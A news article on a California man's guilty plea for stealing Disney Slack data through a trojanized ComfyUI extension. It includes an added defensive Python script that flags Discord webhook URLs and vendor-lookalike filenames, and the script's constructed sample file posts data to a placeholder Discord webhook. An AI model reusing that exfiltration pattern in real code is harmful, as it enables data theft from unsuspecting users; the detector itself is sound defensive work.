Man Admits Guilt in Hacking Disney Employee with Malicious AI Software

A California man, Ryan Mitchell Kramer, age 25, has pleaded guilty to hacking a Walt Disney Company employee by deceiving the individual into installing a malicious version of an open-source AI image generation tool. The US Attorney for the Central District of California announced that Kramer faced charges for unauthorized computer access and for making threats to damage a protected computer.

In his plea agreement, Kramer disclosed that he created an application hosted on GitHub designed to generate AI-based artwork, but it was embedded with code that covertly granted him access to the systems of users who installed it. Operating under the alias “NullBulge,” he aimed to exploit unsuspecting users.

Kramer's program, ComfyUI_LLMVISION, masqueraded as an extension for the legitimate ComfyUI image generator. This counterfeit version, however, included functionality engineered to extract sensitive information such as passwords and payment card details from compromised computers. The stolen data was relayed to a Discord server controlled by Kramer, and the malicious elements of the code were hidden in files named after reputable AI companies such as OpenAI and Anthropic.
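The two traits described above (a vendor-lookalike filename inside a third-party node, and code that reports to a Discord server) are the kind of thing a defender can check for before trusting a ComfyUI extension. The audit script below is an added example written for this article, not code from the case or from the ComfyUI project; the heuristics, the `custom_nodes` layout and the constructed sample files are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics assumed for this example; they are not indicators taken from the case.
# 1. Any file that embeds a Discord webhook URL (a common low-effort exfil channel).
# 2. Files whose names borrow a well-known AI vendor's name inside a third-party node.
DISCORD_WEBHOOK = re.compile(r"https?://discord(?:app)?\.com/api/webhooks/\S+", re.I)
VENDOR_LOOKALIKE = re.compile(r"^(?:openai|anthropic)[^/\\]*\.(?:py|pyc|dll|exe)$", re.I)


def audit_custom_nodes(root):
    """Walk a ComfyUI custom_nodes directory; return sorted (relative_path, reason) findings."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if VENDOR_LOOKALIKE.match(path.name):
            findings.append((rel, "vendor-lookalike filename"))
        try:
            text = path.read_text(errors="ignore")  # tolerate binary content
        except OSError:
            continue
        if DISCORD_WEBHOOK.search(text):
            findings.append((rel, "discord webhook url"))
    return sorted(findings)


def build_sample_tree(root):
    """Write a constructed (fake) custom_nodes tree: one clean node and one suspicious node."""
    clean = Path(root) / "GoodNode"
    clean.mkdir(parents=True, exist_ok=True)
    (clean / "nodes.py").write_text("def run(image):\n    return image\n")
    suspicious = Path(root) / "SuspiciousNode"  # hypothetical name, not the real package
    suspicious.mkdir(parents=True, exist_ok=True)
    (suspicious / "openai_utils.py").write_text(
        "import requests\n"
        "HOOK = 'https://discord.com/api/webhooks/000/CONSTRUCTED_SAMPLE'\n"
        "def send(blob):\n    requests.post(HOOK, json={'content': blob})\n"
    )


def demo():
    """Build the constructed tree in a temp directory and audit it."""
    tmp = tempfile.mkdtemp()
    build_sample_tree(tmp)
    return audit_custom_nodes(tmp)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:26} {rel}")
```

A hit is a prompt for manual review, not proof of malice; legitimate nodes may also mention a vendor name in a filename.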

The Disney employee unknowingly downloaded ComfyUI_LLMVISION in April 2024. This action led to unauthorized access to the employee’s computer and online accounts, enabling Kramer to infiltrate private Slack channels utilized by Disney. By May, he had downloaded approximately 1.1 terabytes of sensitive data from these channels, exposing considerable confidential information.

In early July, Kramer reached out to the employee, falsely claiming to represent a hacktivist group. When there was no response from the employee, he proceeded to publicly release the stolen information later that month, which included not only private Disney data but also the employee’s banking, medical, and personal information.

During the plea proceedings, Kramer acknowledged that at least two other victims had also fallen prey to ComfyUI_LLMVISION, which facilitated unauthorized access to their systems. The FBI is actively investigating the matter, and Kramer is anticipated to appear in court in the coming weeks.

This incident maps onto several adversary tactics described in the MITRE ATT&CK framework. Initial access was achieved through social engineering: the tool was trojanized, and user trust did the work of getting it installed. Persistence techniques were likely embedded as well, since the malware maintained access to the compromised systems. The escalation to privilege abuse is evidenced by Kramer's access to private company channels, which shows how a seemingly innocuous tool can be leveraged for extensive data exfiltration.

As businesses increasingly rely on advanced technologies, the potential for similar attacks emphasizes the necessity of safeguarding against social engineering and the deployment of malicious software. Stakeholders must remain vigilant and proactive in implementing robust cybersecurity measures to mitigate these risks.
